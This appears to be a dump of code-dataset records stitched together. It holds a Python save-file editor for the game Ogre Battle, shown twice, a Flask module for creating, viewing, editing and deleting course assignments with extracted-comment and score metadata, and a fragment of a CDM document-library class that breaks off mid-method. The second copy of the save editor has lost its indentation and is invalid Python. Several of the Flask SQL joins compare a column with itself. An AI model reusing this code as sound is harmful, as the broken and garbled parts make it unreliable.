    Mapping the bytes inside the save state for "Ogre Battle: MofBQ".

    Loads one of the three save slots into an in-memory bytearray, exposes
    typed get/set accessors driven by the *_LAYOUT tables, and writes the
    slot back (with a refreshed checksum) via save().
    """
    # Absolute offset of slot 0 in the file; slots are SLOT_SIZE bytes apart.
    START_ADDRESS = 0x0001
    SLOT_SIZE = 0xAAA
    # Sentinel "name id" registered for the opinion leader's custom name.
    OPINION_LEADER_NAME_REF = 0x07a4
    # offset, size, number of items, field name, deserialize func, serialize func
    UNIT_LAYOUT = [
        (0x0069, 1, 100, "CLASS", bytes_to_class, class_to_bytes),
        (0x0131, 1, 100, "LVL", bytes_to_num, num_to_bytes),
        (0x0195, 1, 100, "EXP", bytes_to_num, num_to_bytes),
        (0x01f9, 2, 100, "HP", bytes_to_num, num_to_bytes),
        (0x02c1, 1, 100, "STR", bytes_to_num, num_to_bytes),
        (0x0325, 1, 100, "AGI", bytes_to_num, num_to_bytes),
        (0x0389, 1, 100, "INT", bytes_to_num, num_to_bytes),
        (0x03ed, 1, 100, "CHA", bytes_to_num, num_to_bytes),
        (0x0451, 1, 100, "ALI", bytes_to_num, num_to_bytes),
        (0x04b5, 1, 100, "LUK", bytes_to_num, num_to_bytes),
        (0x0519, 2, 100, "COST", bytes_to_num, num_to_bytes),
        (0x05e1, 1, 100, "ITEM", bytes_to_item, item_to_bytes),
        (0x0645, 2, 100, "NAME", bytes_to_name, name_to_bytes),
        (0x070d, 1, 100, "GROUP ROSTER", bytes_to_num, num_to_bytes),
        (0x0771, 1, 25, "x9?", bytes_to_num, num_to_bytes),
    ]
    # NOTE(review): GROUPS_LAYOUT rows lack a serialize function and are not
    # reachable through _find_info_entry -- apparently unused/unfinished.
    GROUPS_LAYOUT = [
        (0x078a, 1, 125, "units formation", bytes_to_num),
        (0x0807, 1, 125, "units barraks", bytes_to_num),
        (0x0000, 0, 0, "is group leader", bytes_to_num),
    ]
    MISC_LAYOUT = [
        (0x0aa8, 2, 1, "CHECKSUM", bytes_to_num, num_to_bytes),
        (0x0910, 8, 1, "LEADER_NAME", bytes_to_str, str_to_bytes),
        (0x092b, 3, 1, "MONEY", bytes_to_num, num_to_bytes),
        (0x092f, 1, 1, "REPUTATION", bytes_to_num, num_to_bytes),
    ]
    def __init__(self, file, index):
        """Load slot *index* (0-2) of save file *file* into memory."""
        if index not in (0, 1, 2):
            raise RuntimeError(f"Slot '{index}' does not exists in snes!")
        self.file = file
        self.index = index
        self.data = []
        with open(file, "rb") as f:
            start = (OgreBattleSaveState.START_ADDRESS +
                     OgreBattleSaveState.SLOT_SIZE*index)
            size = OgreBattleSaveState.SLOT_SIZE
            f.seek(start)
            self.data = bytearray(f.read(size))
        if len(self.data) != OgreBattleSaveState.SLOT_SIZE:
            raise RuntimeError(
                f"problem reading slot {index} of file {file}: " +
                f"read {len(self.data)} bytes instead of {size}")
        # update the name of the opinion leader
        # NOTE(review): layout position 4 is the *deserializer* (bytes_to_str)
        # even though it is unpacked into a variable named `serialize`.
        offset, size, _1, info_name, serialize, _2 = self.MISC_LAYOUT[1]
        assert(info_name == "LEADER_NAME")
        try:
            leader_name = serialize(self.data[offset:offset+size])
        except Exception as e:
            # in case the slot is empty the bytes that should contain the
            # leader's name are filled with non-ascii bytes!
            leader_name = "unknown"
        NAMES.append({
            "value": self.OPINION_LEADER_NAME_REF,
            "name": leader_name,
        })
    def _find_info_entry(self, target, info_name):
        """Return the single layout row named *info_name* in layout *target*."""
        INFOS = {
            "UNIT": OgreBattleSaveState.UNIT_LAYOUT,
            "MISC": OgreBattleSaveState.MISC_LAYOUT,
        }
        if target not in INFOS:
            raise RuntimeError(f"Layout for '{target}' not found!")
        entry = [x for x in INFOS[target] if x[3] == info_name]
        if len(entry) != 1:
            raise RuntimeError(f"Found {len(entry)} of '{info_name}' inside '{target}'!")
        return entry[0]
    def get_info(self, info_target, info_name, stride=0):
        """Read one field (element *stride* of an array field) as a ReadData."""
        offset, size, max_stride, _1, deserialize, _2 = self._find_info_entry(info_target, info_name)
        if stride >= max_stride:
            raise IndexError(f"stride {stride} for '{info_name}' is capped at {max_stride}!")
        # Array fields are laid out contiguously, `size` bytes per element.
        address = offset + stride*size
        abslute_address = (OgreBattleSaveState.START_ADDRESS +
                           self.index*OgreBattleSaveState.SLOT_SIZE) + address
        bytes_ = self.data[address:address+size]
        res = ReadData(
            name=info_name,
            value=bytes_to_int(bytes_),
            formatted=deserialize(bytes_),
            raw=bytes_,
            address=abslute_address,
        )
        return res
    def set_info(self, new_value, info_target, info_name, stride=0):
        """Serialize *new_value* into the in-memory slot (not written to disk)."""
        offset, size, max_stride, _1, _2, serialize = self._find_info_entry(info_target, info_name)
        if stride >= max_stride:
            raise IndexError(f"stride {stride} for '{info_name}' is capped at {max_stride}!")
        address = offset + stride*size
        bytes_ = serialize(new_value)
        if len(bytes_) > size:
            raise RuntimeError(f"Bad size for '{info_name}': '{new_value}'->'{bytes_}'")
        # during serialization we do not know the expected number of bytes to
        # fill, but here we do. Hopefully padding with zeroes is always ok!
        while len(bytes_) < size:
            bytes_.append(0)
        self.data[address:address+size] = bytes_
    def get_unit_info(self, unit_index, info_name):
        # Convenience wrapper over get_info for per-unit array fields.
        return self.get_info("UNIT", info_name, stride=unit_index)
    def set_unit_info(self, unit_index, info_name, new_value):
        self.set_info(new_value, "UNIT", info_name, stride=unit_index)
    def get_misc_info(self, info_name):
        return self.get_info("MISC", info_name)
    def set_misc_info(self, info_name, new_value):
        self.set_info(new_value, "MISC", info_name)
    def get_checksum(self):
        # Checksum currently stored in the slot (may be stale after edits).
        return self.get_info("MISC", "CHECKSUM")
    def update_checksum(self):
        # Recompute and store the checksum over the edited slot bytes.
        new_checksum = self.compute_checksum().value
        self.set_info(new_checksum, "MISC", "CHECKSUM")
    def compute_checksum(self):
        """16-bit sum of slot bytes 0x0003..0x0aa7, wrapped in a ReadData."""
        CHECKSUM_START_ADDRESS = 0x0003 # included
        CHECKSUM_END_ADDRESS = 0x0aa8 # excluded
        value = 0
        for i in range(CHECKSUM_START_ADDRESS, CHECKSUM_END_ADDRESS):
            value = (value + self.data[i]) & 0xFFFF
        res = ReadData(
            name="COMPUTED_CHECKSUM",
            value=value,
            formatted=str(value),
            raw=num_to_bytes(value),
            address=0,
        )
        return res
    def save(self):
        """Write this slot (with a refreshed checksum) back into the file."""
        self.update_checksum()
        with open(self.file, "rb") as f:
            content = bytearray(f.read())
        start = OgreBattleSaveState.START_ADDRESS + self.index*OgreBattleSaveState.SLOT_SIZE
        end = start + OgreBattleSaveState.SLOT_SIZE
        content[start:end] = self.data
        with open(self.file, "wb") as f:
            f.write(bytes(content))
|
import collections
import json
# NOTE(review): this region duplicates the save-state helper definitions
# earlier in the file; the later definitions win at import time.
def extractJson(file_name):
    """Read *file_name* and return the parsed JSON document."""
    with open(file_name, "r") as f:
        return json.load(f)
# Static lookup tables bundled with the tool (paths relative to the CWD).
ITEMS = extractJson("data/items.json")
CLASSES = extractJson("data/classes.json")
NAMES = extractJson("data/names.json")
def findInsideList(list_, key, value, default=None):
    """Return the first mapping whose *key* entry equals *value*, else default."""
    for el in list_:
        if el[key] == value:
            return el
    return default
def bytes_to_int(data):
    # type: (bytes) -> int
    # Little-endian decode; empty input yields 0.
    assert(isinstance(data, (bytes, bytearray, )))
    size = len(data)
    res = 0
    for i in reversed(range(size)):
        res = (res << 8) | (data[i] & 0xFF)
    return res
def int_to_bytes(data):
    # type: (int) -> bytes
    # Little-endian list of byte values; always at least one byte.
    if data < 0:
        raise RuntimeError("Cannot convert negative number to bytes!")
    res = []
    while True:
        res.append(data & 0xFF)
        data = data >> 8
        if data == 0x00:
            break
    return res
def bytes_to_num(data):
    # type: (bytes) -> str
    assert(isinstance(data, (bytes, bytearray, )))
    return str(bytes_to_int(data))
def num_to_bytes(data):
    # type: (str)-> bytes
    return int_to_bytes(int(data))
def bytes_to_str(data):
    # type: (bytes) -> str
    # ASCII decode with trailing NUL padding removed.
    assert(isinstance(data, (bytes, bytearray, )))
    i = len(data)-1
    while i >= 0 and data[i] == 0:
        i = i-1
    return data[:i+1].decode("ascii")
def str_to_bytes(data):
    # type: (str) -> bytes
    # NOTE: 'ascii' can be a little too much conservative...
    # NOTE: we are returning `bytes`, and not an `array[int]`, so this function
    # can create some problems since they are not exactly the same, but
    # hopefully their interface is similar enough to make everything work
    return bytes(data, encoding="ascii")
def bytes_to_class(data):
    # type: (bytes) -> str
    assert(isinstance(data, (bytes, bytearray, )))
    res = findInsideList(CLASSES, "value", bytes_to_int(data), {"name": "unknown"})
    return res["name"]
def class_to_bytes(data):
    # type: (str) -> bytes
    res = findInsideList(CLASSES, "name", data, {"value": 0})
    return int_to_bytes(res["value"])
def bytes_to_name(data):
    # type: (bytes) -> str
    assert(isinstance(data, (bytes, bytearray, )))
    res = findInsideList(NAMES, "value", bytes_to_int(data), {"name": "unknown"})
    return res["name"]
def name_to_bytes(data):
    # type: (str) -> bytes
    res = findInsideList(NAMES, "name", data, {"value": 0})
    return int_to_bytes(res["value"])
def bytes_to_item(data):
    # type: (bytes) -> str
    # Item id 0 means "no item carried".
    assert(isinstance(data, (bytes, bytearray, )))
    if bytes_to_int(data) == 0:
        return "none"
    res = findInsideList(ITEMS, "value", bytes_to_int(data), {"name": "unknown", "descr": ""})
    return res["name"]
def item_to_bytes(data):
    # type: (str) -> bytes
    if data == "none":
        return [0x00]
    res = findInsideList(ITEMS, "name", data, {"value": 0})
    return int_to_bytes(res["value"])
# Uniform record returned by read accessors: decoded value plus provenance.
ReadData = collections.namedtuple("ReadData",
        ("name", "value", "formatted", "raw", "address"))
class OgreBattleSaveState(object):
    """
    Mapping the bytes inside the save state for "Ogre Battle: MofBQ".
    """
    # Absolute offset of slot 0 in the file; slots are SLOT_SIZE bytes apart.
    START_ADDRESS = 0x0001
    SLOT_SIZE = 0xAAA
    # Sentinel "name id" registered for the opinion leader's custom name.
    OPINION_LEADER_NAME_REF = 0x07a4
    # offset, size, number of items, field name, deserialize func, serialize func
    UNIT_LAYOUT = [
        (0x0069, 1, 100, "CLASS", bytes_to_class, class_to_bytes),
        (0x0131, 1, 100, "LVL", bytes_to_num, num_to_bytes),
        (0x0195, 1, 100, "EXP", bytes_to_num, num_to_bytes),
        (0x01f9, 2, 100, "HP", bytes_to_num, num_to_bytes),
        (0x02c1, 1, 100, "STR", bytes_to_num, num_to_bytes),
        (0x0325, 1, 100, "AGI", bytes_to_num, num_to_bytes),
        (0x0389, 1, 100, "INT", bytes_to_num, num_to_bytes),
        (0x03ed, 1, 100, "CHA", bytes_to_num, num_to_bytes),
        (0x0451, 1, 100, "ALI", bytes_to_num, num_to_bytes),
        (0x04b5, 1, 100, "LUK", bytes_to_num, num_to_bytes),
        (0x0519, 2, 100, "COST", bytes_to_num, num_to_bytes),
        (0x05e1, 1, 100, "ITEM", bytes_to_item, item_to_bytes),
        (0x0645, 2, 100, "NAME", bytes_to_name, name_to_bytes),
        (0x070d, 1, 100, "GROUP ROSTER", bytes_to_num, num_to_bytes),
        (0x0771, 1, 25, "x9?", bytes_to_num, num_to_bytes),
    ]
    # NOTE(review): rows lack a serialize function and are not reachable
    # through _find_info_entry -- apparently unused/unfinished.
    GROUPS_LAYOUT = [
        (0x078a, 1, 125, "units formation", bytes_to_num),
        (0x0807, 1, 125, "units barraks", bytes_to_num),
        (0x0000, 0, 0, "is group leader", bytes_to_num),
    ]
    MISC_LAYOUT = [
        (0x0aa8, 2, 1, "CHECKSUM", bytes_to_num, num_to_bytes),
        (0x0910, 8, 1, "LEADER_NAME", bytes_to_str, str_to_bytes),
        (0x092b, 3, 1, "MONEY", bytes_to_num, num_to_bytes),
        (0x092f, 1, 1, "REPUTATION", bytes_to_num, num_to_bytes),
    ]
def __init__(self, file, index):
if index not in (0, 1, 2):
raise RuntimeError(f"Slot '{index}' does not exists in snes!")
self.file = file
self.index = index
self.data = []
with open(file, "rb") as f:
start = (OgreBattleSaveState.START_ADDRESS +
OgreBattleSaveState.SLOT_SIZE*index)
size = OgreBattleSaveState.SLOT_SIZE
f.seek(start)
self.data = bytearray(f.read(size))
if len(self.data) != OgreBattleSaveState.SLOT_SIZE:
raise RuntimeError(
f"problem reading slot {index} of file {file}: " +
f"read {len(self.data)} bytes instead of {size}")
# update the name of the opinion leader
offset, size, _1, info_name, serialize, _2 = self.MISC_LAYOUT[1]
assert(info_name == "LEADER_NAME")
try:
leader_name = serialize(self.data[offset:offset+size])
except Exception as e:
# in case the slot is empty the bytes that should contain the
# leader's name are filled with non-ascii bytes!
leader_name = "unknown"
NAMES.append({
"value": self.OPINION_LEADER_NAME_REF,
"name": leader_name,
})
def _find_info_entry(self, target, info_name):
INFOS = {
"UNIT": OgreBattleSaveState.UNIT_LAYOUT,
"MISC": OgreBattleSaveState.MISC_LAYOUT,
}
if target not in INFOS:
raise RuntimeError(f"Layout for '{target}' not found!")
entry = [x for x in INFOS[target] if x[3] == info_name]
if len(entry) != 1:
raise RuntimeError(f"Found {len(entry)} of '{info_name}' inside '{target}'!")
return entry[0]
def get_info(self, info_target, info_name, stride=0):
offset, size, max_stride, _1, deserialize, _2 = self._find_info_entry(info_target, info_name)
if stride >= max_stride:
raise IndexError(f"stride {stride} for '{info_name}' is capped at {max_stride}!")
address = offset + stride*size
abslute_address = (OgreBattleSaveState.START_ADDRESS +
self.index*OgreBattleSaveState.SLOT_SIZE) + address
bytes_ = self.data[address:address+size]
res = ReadData(
name=info_name,
value=bytes_to_int(bytes_),
formatted=deserialize(bytes_),
raw=bytes_,
address=abslute_address,
)
return res
def set_info(self, new_value, info_target, info_name, stride=0):
offset, size, max_stride, _1, _2, serialize = self._find_info_entry(info_target, info_name)
if stride >= max_stride:
raise IndexError(f"stride {stride} for '{info_name}' is capped at {max_stride}!")
address = offset + stride*size
bytes_ = serialize(new_value)
if len(bytes_) > size:
raise RuntimeError(f"Bad size for '{info_name}': '{new_value}'->'{bytes_}'")
# during serialization we do not know the expected number of bytes to
# fill, but here we do. Hopefully padding with zeroes is always ok!
while len(bytes_) < size:
bytes_.append(0)
self.data[address:address+size] = bytes_
def get_unit_info(self, unit_index, info_name):
return self.get_info("UNIT", info_name, stride=unit_index)
def set_unit_info(self, unit_index, info_name, new_value):
self.set_info(new_value, "UNIT", info_name, stride=unit_index)
def get_misc_info(self, info_name):
return self.get_info("MISC", info_name)
def set_misc_info(self, info_name, new_value):
self.set_info(new_value, "MISC", info_name)
def get_checksum(self):
return self.get_info("MISC", "CHECKSUM")
def update_checksum(self):
new_checksum = self.compute_checksum().value
self.set_info(new_checksum, "MISC", "CHECKSUM")
def compute_checksum(self):
CHECKSUM_START_ADDRESS = 0x0003 # included
CHECKSUM_END_ADDRESS = 0x0aa8 # excluded
value = 0
for i in range(CHECKSUM_START_ADDRESS, CHECKSUM_END_ADDRESS):
value = (value + self.data[i]) & 0xFFFF
res = ReadData(
name="COMPUTED_CHECKSUM",
value=value,
formatted=str(value),
raw=num_to_bytes(value),
address=0,
)
return res
def save(self):
self.update_checksum()
with open(self.file, "rb") as f:
content = bytearray(f.read())
start = OgreBattleSaveState.START_ADDRESS + self.index*OgreBattleSaveState.SLOT_SIZE
end = start + OgreBattleSaveState.SLOT_SIZE
content[start:end] = self.data
with open(self.file, "wb") as f:
f.write(bytes(content))
|
en
| 0.849485
|
# type: (bytes) -> int # type: (int) -> bytes # type: (bytes) -> str # type: (str)-> bytes # type: (bytes) -> str # type: (str) -> bytes # NOTE: 'ascii' can be a little too much conservative... # NOTE: we are returning `bytes`, and not an `array[int]`, so this function # can create some problems since they are not exactly the same, but # hopefully their interface is similar enough to make everything work # type: (bytes) -> str # type: (str) -> bytes # type: (bytes) -> str # type: (str) -> bytes # type: (bytes) -> str # type: (str) -> bytes Mapping the bytes inside the save state for "Ogre Battle: MofBQ". # offset, size, number of items, field name, deserialize func, serialize func # update the name of the opinion leader # in case the slot is empty the bytes that should contain the # leader's name are filled with non-ascii bytes! # during serialization we do not know the expected number of bytes to # fill, but here we do. Hopefully padding with zeroes is always ok! # included # excluded
| 3.255673
| 3
|
portal/assignment.py
|
jczimmerman/tsct-portal
| 1
|
6628519
|
from flask import Flask, render_template, g, redirect, url_for, Blueprint, request, session, abort
from . import db
from portal.auth import login_required, teacher_required
from . import course
bp = Blueprint("assignment", __name__)
def get_assignment(id):
user_id = session.get('user_id')
con = db.get_db()
cur = con.cursor()
cur.execute("""SELECT assignments.assignment_id, assignments.session_id,
sessions.course_id, courses.teacherid
FROM assignments JOIN sessions ON assignments.session_id = sessions.id
JOIN courses ON sessions.course_id = courses.course_id
WHERE assignments.assignment_id = %s
AND courses.teacherid = %s""",
(id, user_id))
check_teacher = cur.fetchone()
cur.close()
if check_teacher is None:
con.close()
abort(400, """You cannot modify this assignment""")
else:
cur = con.cursor()
cur.execute("""SELECT assignments.assignment_id, assignments.name, assignments.description,
assignments.due_date
FROM assignments
WHERE assignment_id = %s""",
(id,))
assignment = cur.fetchone()
cur.close()
return assignment
@bp.route('/course/<int:course_id>/session/<int:id>/create_assignment', methods=('GET', 'POST'))
@login_required
@teacher_required
def create_assignment(id, course_id):
"""Single page view to create an assignment."""
con = db.get_db()
cur = con.cursor()
cur.execute("""SELECT sessions.course_id, courses.course_id, courses.name
AS class_name FROM sessions JOIN courses
ON sessions.course_id=sessions.course_id
WHERE sessions.id=%s""",
(id,))
course = cur.fetchone()
cur.close()
if request.method == 'POST':
# Getting all information necessary for creating an assignment
name = request.form['name']
description = request.form['description']
due_date = request.form['date']
total_points = request.form['total_points']
con = db.get_db()
cur = con.cursor()
# Query to actually insert assignment into the database
cur.execute("""
INSERT INTO assignments(session_id, name, description, due_date)
VALUES (%s, %s, %s, %s)""",
(id, name, description, due_date))
g.db.commit()
cur.execute("""SELECT assignment_id from assignments
WHERE session_id = %s
AND name =%s
AND description = %s
AND due_date = %s""",
(id, name, description, due_date))
assignment = cur.fetchone()
cur.execute("""SELECT roster.student_id FROM roster WHERE session_id = %s""",
(id,))
students = cur.fetchall()
for student in students:
cur.execute("""INSERT INTO grades (student_id, assignment_id, total_points)
VALUES (%s, %s, %s) """,
(student['student_id'], assignment['assignment_id'], total_points))
g.db.commit()
cur.close()
con.close()
return redirect(url_for('assignment.view_assignments', id=id, course_id=course_id))
con.close()
return render_template('layouts/assignments/create_assignments.html', course=course)
@bp.route('/course/<int:course_id>/session/<int:id>/assignments', methods=('GET',))
@login_required
def view_assignments(id, course_id):
"""Single page view of all the assignments in a session."""
con = db.get_db()
cur = con.cursor()
cur.execute("""SELECT sessions.id, sessions.course_id, courses.course_id,
courses.teacherid, courses.name
AS class_name FROM sessions JOIN courses
ON sessions.course_id = sessions.course_id
WHERE sessions.id=%s AND courses.course_id= %s""",
(id, course_id,))
course = cur.fetchone()
# Query to get all of the asssignments in a session
cur.execute("""
SELECT * FROM assignments
WHERE session_id = %s
ORDER BY assignment_id ASC
""", (id,))
assignments = cur.fetchall()
cur.close()
con.close()
return render_template('layouts/assignments/view_assignments.html', course=course, id=id, assignments=assignments)
@bp.route('/course/<int:course_id>/session/<int:session_id>/assignment/<int:id>/edit-assignment', methods=('GET', 'POST'))
@login_required
@teacher_required
def edit_assignments(course_id, session_id, id):
"""Singe page view to edit an assignment."""
assignment = get_assignment(id)
if request.method == 'POST':
# getting all info required to update assignment information
name = request.form['name']
description = request.form['description']
due_date = request.form['date']
con = db.get_db()
cur = con.cursor()
# Query to update the information for an assignment
cur.execute("""
UPDATE assignments SET name = %s, description = %s, due_date= %s
WHERE assignment_id = %s
""", (name, description, due_date, id))
# Query to return directly to whichever session the assignment was from
cur.execute("""
SELECT * FROM assignments
WHERE assignment_id = %s""", (id,))
session_id = cur.fetchone()
g.db.commit()
cur.close()
con.close()
return redirect(url_for('assignment.view_assignments', id=session_id['session_id'], course_id=course_id))
return render_template('layouts/assignments/edit_assignments.html', assignment=assignment)
@bp.route('/course/<int:course_id>/session/<int:session_id>/assignment/<int:id>/delete', methods=['POST'])
@login_required
@teacher_required
def delete_assignments(id, course_id, session_id):
"""Deletes any unwanted assignments."""
assignment = get_assignment(id)
assignment_id = assignment['assignment_id']
# Query to delete an assignment from the database
con = db.get_db()
cur = con.cursor()
cur.execute("""DELETE FROM assignments WHERE assignment_id = %s
""", (assignment_id,))
g.db.commit()
cur.close()
con.close()
return redirect(url_for('assignment.view_assignments', id=session_id, course_id=course_id))
|
from flask import Flask, render_template, g, redirect, url_for, Blueprint, request, session, abort
from . import db
from portal.auth import login_required, teacher_required
from . import course
bp = Blueprint("assignment", __name__)
def get_assignment(id):
user_id = session.get('user_id')
con = db.get_db()
cur = con.cursor()
cur.execute("""SELECT assignments.assignment_id, assignments.session_id,
sessions.course_id, courses.teacherid
FROM assignments JOIN sessions ON assignments.session_id = sessions.id
JOIN courses ON sessions.course_id = courses.course_id
WHERE assignments.assignment_id = %s
AND courses.teacherid = %s""",
(id, user_id))
check_teacher = cur.fetchone()
cur.close()
if check_teacher is None:
con.close()
abort(400, """You cannot modify this assignment""")
else:
cur = con.cursor()
cur.execute("""SELECT assignments.assignment_id, assignments.name, assignments.description,
assignments.due_date
FROM assignments
WHERE assignment_id = %s""",
(id,))
assignment = cur.fetchone()
cur.close()
return assignment
@bp.route('/course/<int:course_id>/session/<int:id>/create_assignment', methods=('GET', 'POST'))
@login_required
@teacher_required
def create_assignment(id, course_id):
"""Single page view to create an assignment."""
con = db.get_db()
cur = con.cursor()
cur.execute("""SELECT sessions.course_id, courses.course_id, courses.name
AS class_name FROM sessions JOIN courses
ON sessions.course_id=sessions.course_id
WHERE sessions.id=%s""",
(id,))
course = cur.fetchone()
cur.close()
if request.method == 'POST':
# Getting all information necessary for creating an assignment
name = request.form['name']
description = request.form['description']
due_date = request.form['date']
total_points = request.form['total_points']
con = db.get_db()
cur = con.cursor()
# Query to actually insert assignment into the database
cur.execute("""
INSERT INTO assignments(session_id, name, description, due_date)
VALUES (%s, %s, %s, %s)""",
(id, name, description, due_date))
g.db.commit()
cur.execute("""SELECT assignment_id from assignments
WHERE session_id = %s
AND name =%s
AND description = %s
AND due_date = %s""",
(id, name, description, due_date))
assignment = cur.fetchone()
cur.execute("""SELECT roster.student_id FROM roster WHERE session_id = %s""",
(id,))
students = cur.fetchall()
for student in students:
cur.execute("""INSERT INTO grades (student_id, assignment_id, total_points)
VALUES (%s, %s, %s) """,
(student['student_id'], assignment['assignment_id'], total_points))
g.db.commit()
cur.close()
con.close()
return redirect(url_for('assignment.view_assignments', id=id, course_id=course_id))
con.close()
return render_template('layouts/assignments/create_assignments.html', course=course)
@bp.route('/course/<int:course_id>/session/<int:id>/assignments', methods=('GET',))
@login_required
def view_assignments(id, course_id):
"""Single page view of all the assignments in a session."""
con = db.get_db()
cur = con.cursor()
cur.execute("""SELECT sessions.id, sessions.course_id, courses.course_id,
courses.teacherid, courses.name
AS class_name FROM sessions JOIN courses
ON sessions.course_id = sessions.course_id
WHERE sessions.id=%s AND courses.course_id= %s""",
(id, course_id,))
course = cur.fetchone()
# Query to get all of the asssignments in a session
cur.execute("""
SELECT * FROM assignments
WHERE session_id = %s
ORDER BY assignment_id ASC
""", (id,))
assignments = cur.fetchall()
cur.close()
con.close()
return render_template('layouts/assignments/view_assignments.html', course=course, id=id, assignments=assignments)
@bp.route('/course/<int:course_id>/session/<int:session_id>/assignment/<int:id>/edit-assignment', methods=('GET', 'POST'))
@login_required
@teacher_required
def edit_assignments(course_id, session_id, id):
"""Singe page view to edit an assignment."""
assignment = get_assignment(id)
if request.method == 'POST':
# getting all info required to update assignment information
name = request.form['name']
description = request.form['description']
due_date = request.form['date']
con = db.get_db()
cur = con.cursor()
# Query to update the information for an assignment
cur.execute("""
UPDATE assignments SET name = %s, description = %s, due_date= %s
WHERE assignment_id = %s
""", (name, description, due_date, id))
# Query to return directly to whichever session the assignment was from
cur.execute("""
SELECT * FROM assignments
WHERE assignment_id = %s""", (id,))
session_id = cur.fetchone()
g.db.commit()
cur.close()
con.close()
return redirect(url_for('assignment.view_assignments', id=session_id['session_id'], course_id=course_id))
return render_template('layouts/assignments/edit_assignments.html', assignment=assignment)
@bp.route('/course/<int:course_id>/session/<int:session_id>/assignment/<int:id>/delete', methods=['POST'])
@login_required
@teacher_required
def delete_assignments(id, course_id, session_id):
"""Deletes any unwanted assignments."""
assignment = get_assignment(id)
assignment_id = assignment['assignment_id']
# Query to delete an assignment from the database
con = db.get_db()
cur = con.cursor()
cur.execute("""DELETE FROM assignments WHERE assignment_id = %s
""", (assignment_id,))
g.db.commit()
cur.close()
con.close()
return redirect(url_for('assignment.view_assignments', id=session_id, course_id=course_id))
|
en
| 0.665321
|
SELECT assignments.assignment_id, assignments.session_id, sessions.course_id, courses.teacherid FROM assignments JOIN sessions ON assignments.session_id = sessions.id JOIN courses ON sessions.course_id = courses.course_id WHERE assignments.assignment_id = %s AND courses.teacherid = %s You cannot modify this assignment SELECT assignments.assignment_id, assignments.name, assignments.description, assignments.due_date FROM assignments WHERE assignment_id = %s Single page view to create an assignment. SELECT sessions.course_id, courses.course_id, courses.name AS class_name FROM sessions JOIN courses ON sessions.course_id=sessions.course_id WHERE sessions.id=%s # Getting all information necessary for creating an assignment # Query to actually insert assignment into the database INSERT INTO assignments(session_id, name, description, due_date) VALUES (%s, %s, %s, %s) SELECT assignment_id from assignments WHERE session_id = %s AND name =%s AND description = %s AND due_date = %s SELECT roster.student_id FROM roster WHERE session_id = %s INSERT INTO grades (student_id, assignment_id, total_points) VALUES (%s, %s, %s) Single page view of all the assignments in a session. SELECT sessions.id, sessions.course_id, courses.course_id, courses.teacherid, courses.name AS class_name FROM sessions JOIN courses ON sessions.course_id = sessions.course_id WHERE sessions.id=%s AND courses.course_id= %s # Query to get all of the asssignments in a session SELECT * FROM assignments WHERE session_id = %s ORDER BY assignment_id ASC Singe page view to edit an assignment. # getting all info required to update assignment information # Query to update the information for an assignment UPDATE assignments SET name = %s, description = %s, due_date= %s WHERE assignment_id = %s # Query to return directly to whichever session the assignment was from SELECT * FROM assignments WHERE assignment_id = %s Deletes any unwanted assignments. 
# Query to delete an assignment from the database DELETE FROM assignments WHERE assignment_id = %s
| 2.649792
| 3
|
objectModel/Python/cdm/objectmodel/_document_library.py
|
dhoffland/CDM
| 1
|
6628520
|
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
import threading
from typing import Dict, List, Set, Tuple, Union, TYPE_CHECKING
if TYPE_CHECKING:
from cdm.objectmodel import CdmDocumentDefinition, CdmFolderDefinition
class DocumentLibrary:
"""Synchronizes all dictionaries relating to the documents (and their statuses) in the corpus."""
def __init__(self):
# --- internal ---
self._document_library_lock = threading.Lock()
self._docs_not_loaded = set() # type: Set[str]
self._docs_currently_loading = set() # type: Set[str]
self._docs_not_indexed = set() # type: Set[CdmDocumentDefinition]
self._docs_not_found = set() # type: Set[str]
self._all_documents = [] # type: List[Tuple[CdmFolderDefinition, CdmDocumentDefinition]]
self._path_lookup = {} # type: Dict[str, Tuple[CdmFolderDefinition, CdmDocumentDefinition]]
def _add_document_path(self, path: str, folder: 'CdmFolderDefinition', doc: 'CdmDocumentDefinition'):
"""Adds a folder and document to the list of all documents in the corpus. Also adds the document path to the path lookup."""
with self._document_library_lock:
if path not in self._path_lookup:
self._all_documents.append((folder, doc))
self._path_lookup[path] = (folder, doc)
def _remove_document_path(self, path: str, folder: 'CdmFolderDefinition', doc: 'CdmDocumentDefinition'):
"""Removes a folder and document from the list of all documents in the corpus. Also removes the document path from the path lookup."""
with self._document_library_lock:
if path in self._path_lookup:
self._path_lookup.pop(path)
self._all_documents.remove((folder, doc))
def _list_docs_not_indexed(self) -> Set['CdmDocumentDefinition']:
"""Returns a list of all the documents that are not indexed."""
docs_not_indexed = [] # type: List[CdmDocumentDefinition]
with self._document_library_lock:
# gets all the documents that needs indexing and set the currentlyIndexing flag to true.
for doc in self._docs_not_indexed:
doc._currently_indexing = True
docs_not_indexed.append(doc)
return docs_not_indexed
def _list_docs_not_loaded(self) -> Set[str]:
"""Returns a list of all the documents that are not loaded."""
with self._document_library_lock:
return self._docs_not_loaded.copy()
def _list_all_documents(self) -> List['CdmDocumentDefinition']:
"""Returns a list of all the documents in the corpus."""
with self._document_library_lock:
return [fd[1] for fd in self._all_documents]
def _add_to_docs_not_loaded(self, path: str):
"""Adds a document to the list of documents that are not loaded if its path does not exist in the path lookup."""
with self._document_library_lock:
if path not in self._docs_not_found:
lookup = self._path_lookup.get(path.lower()) # type: Tuple[CdmFolderDefinition, CdmDocumentDefinition]
if not lookup:
self._docs_not_loaded.add(path)
def _fetch_document_and_mark_for_indexing(self, path: str) -> 'CdmDocumentDefinition':
"""Fetches a document from the path lookup and adds it to the list of documents that are not indexed."""
with self._document_library_lock:
if path not in self._docs_not_found:
lookup = self._path_lookup.get(path.lower()) # type: Tuple[CdmFolderDefinition, CdmDocumentDefinition]
if lookup:
inner_doc = lookup[1] # type: CdmDocumentDefinition
if not inner_doc._imports_indexed and not inner_doc._currently_indexing:
# mark for indexing.
inner_doc._currently_indexing = True
self._docs_not_indexed.add(inner_doc)
return inner_doc
return None
def _need_to_load_document(self, doc_name: str) -> bool:
"""Sets a document's status to loading if the document needs to be loaded."""
with self._document_library_lock:
if doc_name in self._docs_not_loaded and doc_name not in self._docs_not_found and doc_name not in self._docs_currently_loading:
# set status to loading
self._docs_not_loaded.remove(doc_name)
self._docs_currently_loading.add(doc_name)
return True
return False
def _mark_document_as_loaded_or_failed(self, doc: 'CdmDocumentDefinition', doc_name: str, docs_now_loaded: Set['CdmDocumentDefinition']) -> bool:
"""Marks a document for indexing if it has loaded successfully, or adds it to the list of documents not found if it failed to load."""
with self._document_library_lock:
